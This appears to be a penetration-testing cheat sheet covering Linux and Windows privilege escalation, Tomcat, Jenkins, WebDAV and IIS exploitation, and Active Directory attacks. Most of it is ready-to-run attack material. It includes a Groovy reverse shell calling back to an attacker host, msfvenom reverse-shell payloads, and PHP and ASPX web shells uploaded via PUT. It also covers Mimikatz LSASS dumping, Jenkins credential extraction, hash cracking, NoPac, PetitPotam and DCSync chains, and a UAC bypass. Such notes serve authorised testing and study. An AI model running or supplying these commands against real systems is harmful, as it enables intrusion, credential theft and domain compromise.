Check system-wide cron configuration

cat /etc/crontab
ls -la /etc/cron.*

Check current user’s crontab

crontab -l

List scripts called by cron — check if any are writable

find /etc/cron* /var/spool/cron -type f 2>/dev/null | xargs ls -la 2>/dev/null

Run pspy64 to catch cron jobs not visible in crontab files

./pspy64 -pf -i 1000

Path Hijacking

Check $PATH for writable directories

echo $PATH

Find writable directories currently in PATH

find $(echo $PATH | tr ':' ' ') -writable 2>/dev/null

Writable Sensitive Files

Check if /etc/passwd is writable

ls -la /etc/passwd

Find world-writable files outside temp and proc directories

find / -writable -type f 2>/dev/null | grep -v "proc\|sys\|dev\|run"

Group Abuse

Docker group — mount host filesystem from inside a container

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

LXD group — create privileged container with host filesystem mounted

lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh

NFS

Check exports from attack box

showmount -e <TARGET>

Check exports on target — look for no_root_squash

cat /etc/exports

Internal Services

Forward an internal port to the attack box if a local-only service is found

ssh -L <LOCAL_PORT>:127.0.0.1:<REMOTE_PORT> <USER>@<TARGET>

Kernel Exploits

Note kernel version from uname -a and search Exploit-DB for public exploits
Cross-reference Linux Exploit Suggester output from top of checklist

Config File Locations

Common configuration file and web root paths for Linux and Windows — web servers, databases, and services.

Web Roots

Server	Path
Apache (Ubuntu/Debian)	`/var/www/html/`
Apache (Arch)	`/srv/http/`
Apache (RHEL/CentOS)	`/usr/share/httpd/`
Nginx (RHEL/CentOS)	`/usr/share/nginx/html/`
IIS (Windows)	`C:\inetpub\wwwroot\`
XAMPP (Windows)	`C:\xampp\htdocs\`
User web dirs	`/home/<USER>/public_html/`

Web Server Configs

Apache

/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/apache2/sites-enabled/
/etc/httpd/conf/httpd.conf

Nginx

/etc/nginx/nginx.conf
/etc/nginx/sites-available/
/etc/nginx/sites-enabled/

IIS

C:\Windows\System32\inetsrv\config\applicationHost.config
C:\inetpub\wwwroot\web.config

CMS Configs

CMS	Config File
WordPress	`/var/www/html/wp-config.php`
Joomla	`/var/www/html/configuration.php`
Drupal 7	`/var/www/html/sites/default/settings.php`
Drupal 8+	`/var/www/html/sites/default/settings.php`
MediaWiki	`/var/www/html/LocalSettings.php`

Database Configs

MySQL

/etc/mysql/my.cnf
/etc/mysql/mysql.conf.d/mysqld.cnf
/etc/my.cnf

PostgreSQL

/etc/postgresql/*/main/pg_hba.conf
/etc/postgresql/*/main/postgresql.conf

MSSQL (Windows)

C:\Program Files\Microsoft SQL Server\MSSQL*\MSSQL\Binn\mssql.conf

SSH

/etc/ssh/sshd_config
~/.ssh/authorized_keys
~/.ssh/known_hosts
~/.ssh/id_rsa

FTP

/etc/vsftpd.conf
/etc/ftpusers
/etc/proftpd/proftpd.conf

Common Linux Auth Files

/etc/passwd
/etc/shadow
/etc/group
/etc/sudoers
/etc/hosts

Apache Tomcat

Tomcat manager discovery, default credential testing, WAR file upload for RCE, and AJP exploitation.

Discovery

Key paths that confirm Tomcat

/manager/html
/manager/status
/host-manager/html
/docs/
/examples/

Server header leaks version

curl -sI http://<TARGET>/ | grep -i server

Fingerprinting

whatweb http://<TARGET>
sudo nmap -sV -p8080,8443 --script http-title,http-server-header <TARGET>

Default Credentials

Try these against /manager/html

Username	Password
`admin`	`admin`
`tomcat`	`tomcat`
`tomcat`	`s3cret`
`manager`	`manager`
`admin`	`s3cret`
`admin`	`password`
`root`	`root`

Manager Brute Force

hydra -L /usr/share/seclists/Usernames/tomcat-usernames.txt -P /usr/share/seclists/Passwords/tomcat-passwords.txt http-get://<TARGET>:8080/manager/html

WAR File Upload — RCE (Manager Access Required)

Create a malicious WAR containing a JSP shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ATTACKER> LPORT=<PORT> -f war -o shell.war

Upload via Manager UI: Tomcat Web Application Manager → Deploy → WAR file to deploy → Browse → Deploy

Or via curl

curl -u <USER>:<PASS> -T shell.war "http://<TARGET>:8080/manager/text/deploy?path=/shell"

Trigger the shell

curl http://<TARGET>:8080/shell/

Undeploy when done

curl -u <USER>:<PASS> "http://<TARGET>:8080/manager/text/undeploy?path=/shell"

Via Metasploit

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <TARGET>
set RPORT 8080
set HttpUsername <USER>
set HttpPassword <PASS>
run

Ghostcat — CVE-2020-1938 (AJP 8009)

Reads arbitrary files from the webapp root including WEB-INF files. Affects Tomcat < 9.0.31, 8.5.51, 7.0.100.

python3 ghostcat.py -u http://<TARGET> -p 8009 -f WEB-INF/web.xml

Via Metasploit

use auxiliary/scanner/http/tomcat_ghostcat
set RHOSTS <TARGET>
run

Config File (if system access)

cat /opt/tomcat/conf/tomcat-users.xml

Contains manager credentials in plaintext.

Dehashed

Dehashed — breach data search for emails, usernames, passwords, and domains.

Search

Query by domain and print results

python3 dehashed.py -q <DOMAIN> -p

Query by username

python3 dehashed.py -q <USERNAME> -p

Query by email

python3 dehashed.py -q <EMAIL> -p

PrivEsc — Windows

Escalate from a low-privilege Windows shell — services, tokens, scheduled tasks, and registry.

Automated Tools

Run WinPEAS

winPEASx64.exe

Run PowerUp

. .\PowerUp.ps1; Invoke-AllChecks

Run SharpUp

.\SharpUp.exe audit

User & System Context

Check current user, group memberships, and privileges

whoami /all

Check OS version and patch level

systeminfo

List installed patches

Windows — CMD

wmic qfe list brief

Windows — PowerShell

Get-HotFix | Sort-Object InstalledOn

Token Privileges

Check which privileges are assigned to the current user

whoami /priv

SeImpersonatePrivilege — use PrintSpoofer to spawn a SYSTEM shell

PrintSpoofer64.exe -i -c cmd

SeImpersonatePrivilege — use GodPotato to spawn a SYSTEM shell

GodPotato.exe -cmd "cmd /c whoami"

SeBackupPrivilege — can read any file bypassing ACLs; dump SAM and SYSTEM hives

reg save HKLM\SAM C:\temp\sam.hive
reg save HKLM\SYSTEM C:\temp\system.hive

SeTcbPrivilege — use TcbElevation to escalate to SYSTEM

TcbElevation.exe cmd.exe

SeDebugPrivilege — can attach to and read any process; use Mimikatz to dump LSASS

privilege::debug
sekurlsa::logonpasswords

SeTakeOwnershipPrivilege — can take ownership of any file or object regardless of ACLs

takeown /f "C:\path\to\file"
icacls "C:\path\to\file" /grant <USER>:F

Service Misconfigurations

Review SharpUp and PowerUp output for CanRestart services and weak binary permissions
Check permissions on a flagged service binary

Windows — CMD

icacls "C:\path\to\service.exe"

Windows — PowerShell

Get-Acl "C:\path\to\service.exe" | Format-List

Check for weak service ACLs with AccessChk

accesschk.exe /accepteula -quvcw <SERVICE_NAME>

Check for permissive registry ACLs on services

accesschk.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services

Check for unquoted service paths

Windows — CMD

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

Windows — PowerShell

Get-WmiObject win32_service | Select-Object Name, PathName | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -notlike 'C:\Windows\*'}

Inspect a specific service

sc qc <SERVICE_NAME>

Group Abuse

Check group memberships for privileged built-in groups

whoami /groups

Server Operators — reconfigure an existing service to create a local admin user

sc config <SERVICE_NAME> binPath= "cmd.exe /c net user <USER> <PASS> /add & net localgroup Administrators <USER> /add"
sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>

Scheduled Tasks

List scheduled tasks not owned by Microsoft

Windows — CMD

schtasks /query /fo LIST /v

Windows — PowerShell

Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft\*"} | Select-Object TaskName, TaskPath

Check permissions on the task action binary or script

icacls "C:\path\to\task\binary.exe"

Registry

Check AlwaysInstallElevated — if both keys are 1, MSI files run as SYSTEM

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check autorun keys for writable binary paths

Windows — CMD

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows — PowerShell

Get-CimInstance Win32_StartupCommand | Select-Object Name, Command, Location, User | Format-List

DLL Hijacking

Check PATH for writable directories

Windows — CMD

echo %PATH%

Windows — PowerShell

$env:Path -split ';'

Use Process Monitor on the target to find missing DLL loads — filter Result = NAME NOT FOUND, Path ends with .dll

UAC Bypass

Confirm current user is in the local Administrators group

net localgroup administrators

fodhelper bypass — set up registry key then trigger

Windows — CMD

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
fodhelper.exe

Kernel / OS Exploits

Note OS build number from systeminfo and search Exploit-DB for public exploits
Run Windows Exploit Suggester on attack box

python3 wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only

Linux Commands

Quick-reference Linux commands for /etc/hosts management, process inspection, permissions, and network monitoring.

/etc/hosts

Add a single host

echo "<IP> <HOSTNAME>" | sudo tee -a /etc/hosts

Add multiple vhosts at once

echo "<IP> web.example.com admin.example.com dev.example.com" | sudo tee -a /etc/hosts

Permissions

Check file or binary permissions

ls -la <PATH>

Check sudo permissions for current user

sudo -l

Find SUID binaries

find / -perm -4000 -type f 2>/dev/null

Find world-writable files

find / -writable -type f 2>/dev/null | grep -v proc

Processes

List all running processes

ps auxf

Check for running database or web services

ps auxf | grep -i mysql
ps auxf | grep -i postgres
ps auxf | grep -i apache
ps auxf | grep -i nginx

Environment

Check shell

echo $SHELL

Check Python version

which python python3
python3 --version

Current user and groups

id
whoami

Network Monitoring

Monitor live traffic on an interface

sudo vnstat -l -i eth0

View connection stats

ss -tulnp
netstat -tulnp

Shell Upgrades

Upgrade a basic reverse shell to a full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

Then Ctrl+Z, then:

stty raw -echo; fg

In the shell:

export TERM=xterm
stty rows 40 cols 180

Jenkins

Jenkins discovery, unauthenticated access, Groovy script console RCE, and credential extraction.

Discovery

Default port: 8080 (sometimes 8443 or 443 behind a proxy)

/login
/script          ← Groovy console — direct RCE if accessible
/credentials/
/manage

curl -s http://<TARGET>:8080/ | grep -i jenkins
whatweb http://<TARGET>:8080

Check for Unauthenticated Access

Some Jenkins instances allow anonymous read or even full admin access

curl -s http://<TARGET>:8080/api/json | python3 -m json.tool
curl -s http://<TARGET>:8080/script

If /script returns a Groovy console without a redirect — you have unauthenticated RCE.

Default Credentials

Username	Password
`admin`	`admin`
`admin`	`password`
`jenkins`	`jenkins`

Groovy Script Console RCE (Admin Required)

Manage Jenkins → Script Console

Execute OS command

def cmd = "id"
def proc = cmd.execute()
proc.waitFor()
println proc.text

Reverse shell

String host = "<ATTACKER>"
int port = <PORT>
String cmd = "bash"
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start()
Socket s = new Socket(host, port)
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream()
OutputStream po = p.getOutputStream(), so = s.getOutputStream()
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read())
    while (pe.available() > 0) so.write(pe.read())
    while (si.available() > 0) po.write(si.read())
    so.flush(); po.flush()
    Thread.sleep(50)
    try { p.exitValue(); break } catch (Exception e) {}
}
p.destroy(); s.close()

Extract Stored Credentials

Credentials are encrypted and stored in XML. Decrypt them via the console:

import com.cloudbees.plugins.credentials.*
import com.cloudbees.plugins.credentials.impl.*

def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
    com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials.class,
    Jenkins.instance, null, null)

for (c in creds) {
    println(c.id + " : " + c.username + " : " + c.password)
}

Build Job — Command Injection

If you can create or modify build jobs: New Item → Freestyle project → Build → Execute shell

Paste reverse shell in the build step, then build the project.

Config Files (if system access)

cat /var/lib/jenkins/config.xml
cat /var/lib/jenkins/credentials.xml
ls /var/lib/jenkins/users/

DomainPasswordSpray

DomainPasswordSpray — PowerShell password spraying against Active Directory.

Usage

Import the module

Import-Module .\DomainPasswordSpray.ps1

Spray a single password against all domain users

Invoke-DomainPasswordSpray -Password '<PASSWORD>' -OutFile spray_results.txt

Spray against a specific user list

Invoke-DomainPasswordSpray -UserList users.txt -Password '<PASSWORD>' -OutFile spray_results.txt

Spray against a specific domain

Invoke-DomainPasswordSpray -Domain <DOMAIN> -Password '<PASSWORD>' -OutFile spray_results.txt

AD Enumeration

Enumerate Active Directory from unauthenticated and authenticated positions — users, groups, shares, and BloodHound.

Initial Enumeration (No Credentials)

Sync clock with the domain controller — Kerberos auth fails if skew exceeds 5 minutes

sudo ntpdate <DC_IP>

Enumerate password policy via null session

nxc smb <DC_IP> -u '' -p '' --pass-pol

Enumerate users via null SMB session

nxc smb <DC_IP> -u '' -p '' --users

Validate usernames with Kerbrute — does not increment bad password count

kerbrute userenum -d <DOMAIN> --dc <DC_IP> /opt/jsmith.txt

Enumeration With Credentials

Validate credentials

nxc smb <DC_IP> -u <USER> -p '<PASS>'

Enumerate users — check badpwdcount before spraying

nxc smb <DC_IP> -u <USER> -p '<PASS>' --users

Enumerate groups — check membercount

nxc smb <DC_IP> -u <USER> -p '<PASS>' --groups

Enumerate logged-on users across hosts

nxc smb <DC_IP> -u <USER> -p '<PASS>' --loggedon-users

Enumerate shares

nxc smb <DC_IP> -u <USER> -p '<PASS>' --shares

Spider a specific share for interesting files

nxc smb <DC_IP> -u <USER> -p '<PASS>' -M spider_plus --share '<SHARE_NAME>'

Enumerate DNS records — often reveals hosts invisible to scanners

adidnsdump -u <DOMAIN>\\<USER> ldap://<DC_IP> -r

Enumerate Group Managed Service Accounts and read passwords if current user is authorized

nxc ldap <DC_IP> -u <USER> -p '<PASS>' --gmsa

PowerView Enumeration

Load PowerView

Import-Module .\PowerView.ps1

Get detailed info on a domain user

Get-DomainUser -Identity <USER> | Select-Object name,samaccountname,description,memberof,pwdlastset,lastlogontimestamp,admincount,serviceprincipalname,useraccountcontrol

Get recursive group membership

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Find Kerberoastable users — have SPNs set

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

Find AS-REP Roastable users — Kerberos pre-auth disabled

Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname

Check for passwords stored in description fields

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

Check for PASSWD_NOTREQD — accounts that may have no password set

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Test local admin access on a specific host

Test-AdminAccess -ComputerName <HOSTNAME>

Map all domain trust relationships

Get-DomainTrustMapping

BloodHound Collection

Collect all data from Linux with bloodhound-python

bloodhound-python -u <USER> -p '<PASS>' -d <DOMAIN> -dc <DC_IP> -c all

Collect from Linux with rusthound-ce

rusthound-ce -d <DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASS>' -o ./bh -z

Collect from Windows with SharpHound

.\SharpHound.exe -c All --zipfilename bh_out

Run Snaffler to find credentials and sensitive files across shares

Snaffler.exe -s -d <DOMAIN> -o snaffler.log -v data

Recursive directory listing of a share with SMBMap

smbmap -u <USER> -p '<PASS>' -d <DOMAIN> -H <DC_IP> -R '<SHARE_NAME>' --dir-only

Security Controls

Check Windows Defender status

Get-MpComputerStatus

Check AppLocker policy

Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections

Check PowerShell language mode — ConstrainedLanguage blocks many post-exploitation tools

$ExecutionContext.SessionState.LanguageMode

Find groups delegated to read LAPS passwords

Find-LAPSDelegatedGroups

Find accounts with AllExtendedRights over LAPS-managed computers

Find-AdmPwdExtendedRights

List LAPS-managed computers and show passwords if accessible

Get-LAPSComputers

Finding Files

Search for files and strings on Linux and Windows by name, content, and pattern.

Linux — By Name

find / -iname "*<KEYWORD>*" 2>/dev/null
find / -iname "*.conf" 2>/dev/null
find / -iname "*backup*" 2>/dev/null
find / -iname "*.bak" -o -iname "*.old" 2>/dev/null

Linux — By Content

grep -rni "<KEYWORD>" /var/www/html/
grep -rni "password" /etc/ 2>/dev/null
grep -rni "secret" /home/ 2>/dev/null

Linux — SUID / Writable

find / -perm -4000 -type f 2>/dev/null
find / -writable -type d 2>/dev/null

Linux — Recently Modified

find / -mmin -60 -type f 2>/dev/null
find / -newer /tmp/ref 2>/dev/null

Windows — By Name (CMD)

dir /s /b *<KEYWORD>*
dir /s /b *.config
dir /s /b *.bak

Windows — By Name (PowerShell)

Get-ChildItem -Recurse -Filter "*<KEYWORD>*"
Get-ChildItem -Recurse -Include *.config,*.bak,*.txt

Windows — By Content (CMD)

findstr /s /i /n "<KEYWORD>" *.*
findstr /s /i "password" *.txt *.config *.ini

Windows — By Content (PowerShell)

Get-ChildItem -Recurse -File | Select-String -Pattern "<KEYWORD>"
Select-String -Path "C:\inetpub\wwwroot\*" -Pattern "password" -Recurse

Common Things to Search For

# Linux
grep -rni "password\|passwd\|secret\|api_key\|token" /var/www/ 2>/dev/null
find / -name "*.php" -exec grep -li "password" {} \; 2>/dev/null

# Windows
findstr /s /i "password" C:\inetpub\*.config
findstr /s /i "password" C:\Users\*.txt

WebDAV

WebDAV discovery, method enumeration, file upload via PUT, and shell delivery with cadaver.

Discovery

WebDAV is commonly exposed on IIS and Apache. Check for it by testing HTTP methods:

curl -sI -X OPTIONS http://<TARGET>/webdav/

Look for Allow: header — PUT and MOVE indicate writable WebDAV.

Nmap script

sudo nmap -sV -p80,443 --script http-webdav-scan <TARGET>

davtest — Automated Upload Testing

Tests which file types can be uploaded and executed

davtest -url http://<TARGET>/webdav/

With credentials

davtest -url http://<TARGET>/webdav/ -auth <USER>:<PASS>

Upload via curl (PUT)

curl -X PUT http://<TARGET>/webdav/shell.php -d '<?php system($_GET["cmd"]); ?>'

With credentials

curl -X PUT http://<TARGET>/webdav/shell.php -u '<USER>:<PASS>' -d '<?php system($_GET["cmd"]); ?>'

Trigger the shell

curl http://<TARGET>/webdav/shell.php?cmd=id

cadaver — Interactive WebDAV Client

cadaver http://<TARGET>/webdav/

Upload a file

dav:/webdav/> put shell.php

With credentials

cadaver http://<USER>:<PASS>@<TARGET>/webdav/

MOVE Bypass (Extension Filter Evasion)

If the server blocks .php uploads but allows other extensions, upload as .txt then MOVE to .php

curl -X PUT http://<TARGET>/webdav/shell.txt -u '<USER>:<PASS>' --data-binary @shell.php
curl -X MOVE http://<TARGET>/webdav/shell.txt -u '<USER>:<PASS>' -H "Destination: http://<TARGET>/webdav/shell.php"

Notes

IIS with WebDAV enabled often has a /webdav/ or root WebDAV path
Check /etc/apache2/conf-available/webdav.conf or IIS config for auth settings
Even a locked-down WebDAV (auth required) may have weak default creds

enum4linux-ng

enum4linux-ng — SMB/RPC enumeration for users, groups, shares, and password policy.

Full Enumeration

./enum4linux-ng.py <TARGET> -A

Output results to YAML

./enum4linux-ng.py <TARGET> -A -oY output

Enumerate with credentials

./enum4linux-ng.py <TARGET> -A -u <USER> -p '<PASS>'

Enumerate users only

./enum4linux-ng.py <TARGET> -U

Enumerate shares only

./enum4linux-ng.py <TARGET> -S

AD Credential Attacks

LLMNR poisoning, password spraying, AS-REP Roasting, Kerberoasting, GPP passwords, and Active Directory vulnerability exploitation.

Forced Hash Capture — Slinky

Plant a malicious LNK file in a writable share — hashes are captured when users browse the share

nxc smb <DC_IP> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME>

Start InveighZero on the listener host to capture incoming NTLMv2 hashes

Windows — InveighZero

.\Inveigh.exe

Crack captured hashes

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Clean up the LNK file after capturing

nxc smb <DC_IP> -u <USER> -p '<PASS>' -M slinky -o SERVER=<LISTENER_IP> NAME=<LINK_NAME> CLEANUP=YES

LLMNR / NBT-NS Poisoning

Start Responder to capture NTLMv2 hashes from the network

Linux

sudo responder -I <INTERFACE>

Start InveighZero to capture hashes from a Windows host

Windows — CMD

.\Inveigh.exe

View captured unique NTLMv2 hashes within the Inveigh prompt

GET NTLMV2UNIQUE

Crack captured NTLMv2 hashes with Hashcat

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Password Spraying

Check password policy and lockout threshold before spraying

nxc smb <DC_IP> -u <USER> -p '<PASS>' --pass-pol

Spray with Kerbrute

kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> valid_users.txt <PASSWORD>

Spray with NXC — grep + to find valid hits

nxc smb <DC_IP> -u valid_users.txt -p '<PASSWORD>' | grep +

Validate a credential hit

nxc smb <DC_IP> -u <USER> -p '<PASS>'

AS-REP Roasting

Find AS-REP Roastable accounts and capture hashes with NXC

nxc ldap <DC_IP> -u <USER> -p '<PASS>' --asreproast asreproast.out

Request AS-REP hash for a specific user with Rubeus

.\Rubeus.exe asreproast /user:<USER> /nowrap /format:hashcat

Crack AS-REP hashes with Hashcat

hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt

Kerberoasting

List SPN accounts and request all TGS tickets with GetUserSPNs.py

Linux

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -request -outputfile kerberoast.out

Request a TGS ticket for a specific user

Linux

GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>' -request-user <TARGET_USER> -outputfile kerberoast.out

Kerberoast with PowerView and export to CSV

Windows — PowerShell

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs_tickets.csv -NoTypeInformation

Crack TGS hashes with Hashcat

hashcat -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt

GPP / SYSVOL Passwords

Search for GPP autologon credentials with NXC

nxc smb <DC_IP> -u <USER> -p '<PASS>' -M gpp_autologin

Decrypt a recovered cpassword value

gpp-decrypt <CPASSWORD_VALUE>

NoPac (SamAccountName Spoofing)

Scan for NoPac vulnerability with NXC

nxc smb <DC_IP> -u <USER> -p '<PASS>' -M nopac

Exploit NoPac to get a SYSTEM shell

python3 noPac.py <DOMAIN>/<USER>:'<PASS>' -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> -shell --impersonate administrator -use-ldap

Exploit NoPac to DCSync and dump hashes

python3 noPac.py <DOMAIN>/<USER>:'<PASS>' -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user <DOMAIN>/administrator

PetitPotam (MS-EFSRPC)

Check for PetitPotam vulnerability with NXC

nxc smb <DC_IP> -M PetitPotam

Start NTLM relay targeting AD CS enrollment endpoint

ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController

Trigger coercion from a second terminal

python3 PetitPotam.py <LISTENER_IP> <DC_IP>

Request a TGT using the captured base64 certificate

python3 gettgtpkinit.py <DOMAIN>/<DC_HOSTNAME>$ -pfx-base64 <BASE64_CERT> dc01.ccache

Set the ticket and DCSync as the domain controller

export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user <DOMAIN>/administrator -k -no-pass "<DC_HOSTNAME>$"@<DC_FQDN>

URL Encoding

URL percent-encoding reference for special characters commonly used in web exploitation and payload crafting.

Common Special Characters

Char	Encoded	Notes
space	`%20`	Also `+` in form data
`!`	`%21`
`"`	`%22`
`#`	`%23`	Fragment identifier
`$`	`%24`
`%`	`%25`	Must encode to include a literal `%`
`&`	`%26`	Parameter separator
`'`	`%27`	Single quote
`(`	`%28`
`)`	`%29`
`*`	`%2A`
`+`	`%2B`	Plus sign (vs. space)
`/`	`%2F`	Path separator — encode to bypass path checks
`:`	`%3A`
`;`	`%3B`
`<`	`%3C`	XSS payloads
`=`	`%3D`	Parameter separator
`>`	`%3E`
`?`	`%3F`	Query string start
`@`	`%40`
`[`	`%5B`
`\`	`%5C`	Windows path separator
`]`	`%5D`
`^`	`%5E`
`	`%60`
`{`	`%7B`
`\|`	`%7C`
`}`	`%7D`
`~`	`%7E`

Null Byte

Sequence	Encoded
Null byte	`%00`
Carriage return	`%0D`
Line feed	`%0A`
CRLF	`%0D%0A`

Null byte (%00) is useful for truncating file extensions in legacy applications — e.g., shell.php%00.jpg may be stored as shell.php.

Double Encoding

Encode the % sign to bypass WAFs and input filters that only decode once

Char	Single	Double
`/`	`%2F`	`%252F`
`.`	`%2E`	`%252E`
`\`	`%5C`	`%255C`

Encode / Decode Quickly

python3 -c "import urllib.parse; print(urllib.parse.quote('<STRING>'))"
python3 -c "import urllib.parse; print(urllib.parse.unquote('<ENCODED>'))"

IIS

IIS fingerprinting, ASPX shell upload, WebDAV abuse, short filename enumeration, and PUT method exploitation.

Discovery

curl -sI http://<TARGET>/ | grep -i server
sudo nmap -sV -p80,443 --script http-iis-webdav-vuln,http-methods <TARGET>

Server: Microsoft-IIS/10.0 in the response confirms IIS and reveals version.

Common IIS Default Paths

/iisstart.htm
/default.asp
/default.aspx
/web.config
/_vti_bin/           ← FrontPage extensions
/_vti_bin/_vti_aut/
/aspnet_client/

ASPX Web Shell Upload

If file upload exists, upload an ASPX shell (classic IIS extension for code execution)

Simple ASPX shell

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<% Response.Write(Process.Start(new ProcessStartInfo("cmd.exe", "/c " + Request["cmd"]) { RedirectStandardOutput = true }).StandardOutput.ReadToEnd()); %>

Trigger

curl http://<TARGET>/shell.aspx?cmd=whoami

Generate with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER> LPORT=<PORT> -f aspx -o shell.aspx

WebDAV on IIS

Check if WebDAV is enabled and PUT is allowed

curl -sI -X OPTIONS http://<TARGET>/
davtest -url http://<TARGET>/

See the WebDAV page for full upload and MOVE bypass techniques.

Short Filename (8.3) Enumeration — IIS Tilde Vulnerability

Forces IIS to expose hidden directories and filenames via 8.3 naming format

python3 iis_shortname_scanner.py http://<TARGET>/

Or with the Metasploit auxiliary

use auxiliary/scanner/http/iis_shortname_scanner
set RHOSTS <TARGET>
run

PUT Method (HTTP)

Check if PUT is enabled on the root or a specific directory

curl -X PUT http://<TARGET>/shell.aspx --data-binary @shell.aspx

CGI and cmd.exe via Old Vulns

IIS 5/6 with WebDAV

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

IIS CGI command injection (CVE-2017-7269 — IIS 6.0 with WebDAV)

use exploit/windows/iis/iis_webdav_upload_asp

Config File (if system access)

C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config

Check for connection strings, credentials, and custom error pages that may leak paths.

fping

fping — fast ICMP host discovery across a subnet or host list.

CIDR Sweep

fping -asgq <CIDR>

Scan from Host List

fping -asgq -f hosts.txt

Flags

Flag	Description
`-a`	Show alive hosts only
`-s`	Print summary stats
`-g`	Generate target list from CIDR
`-q`	Quiet — suppress per-host output
`-f <file>`	Read targets from file

AD ACL & Trust Abuse

Enumerate and abuse Active Directory object permissions — ACE attacks, DCSync, shadow credentials, Golden/Silver tickets, and domain trust exploitation.

ACL Enumeration

Use BloodHound to visualize ACL attack paths — check Outbound Object Control on any owned node
Find ACEs where the current user has rights over other objects

$sid = Convert-NameToSid <CURRENT_USER>
Get-DomainObjectACL -ResolveGUIDs -Identity * | Where-Object {$_.SecurityIdentifier -eq $sid}

Enumerate ACLs across all domain users and filter for current user’s rights

foreach($line in [System.IO.File]::ReadLines("ad_users.txt")) {get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match '<CURRENT_USER>'}}

Search for deleted objects

bloodyAD -d <DOMAIN> -u <USER> -p '<PASS>' --host <DC_FQDN> --dc-ip <DC_IP> get search -c 1.2.840.113556.1.4.2064 --filter '(isDeleted=TRUE)'

ForceChangePassword

Change the target user’s password without knowing the current one

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' set password <TARGET_USER> '<NEW_PASS>'

Windows — PowerView

Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString '<NEW_PASS>' -AsPlainText -Force)

GenericAll

Change the target user’s password

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' set password <TARGET_USER> '<NEW_PASS>'

Windows — PowerView

Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString '<NEW_PASS>' -AsPlainText -Force)

Add a user to a group

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add groupMember <GROUP> <MEMBER>

Windows — PowerView

Add-ADGroupMember -Identity "<GROUP>" -Members <MEMBER>

Add shadow credentials to the target

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add shadowCredentials <TARGET_USER>

GenericWrite

Add an SPN to the target user to make them Kerberoastable

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' set object <TARGET_USER> servicePrincipalName -v 'fake/spn'

Windows — PowerView

Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/spn'}

Kerberoast the target after setting the SPN

Linux — NXC

nxc ldap <DC_IP> -u <USER> -p '<PASS>' --kerberoasting kerberoasting.out

Windows — Rubeus

.\Rubeus.exe kerberoast /user:<TARGET_USER> /nowrap

Add shadow credentials to the target

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' add shadowCredentials <TARGET_USER>

WriteOwner

Take ownership of the target object

Linux — BloodyAD

bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASS>' set owner <TARGET_OBJECT> <USER>
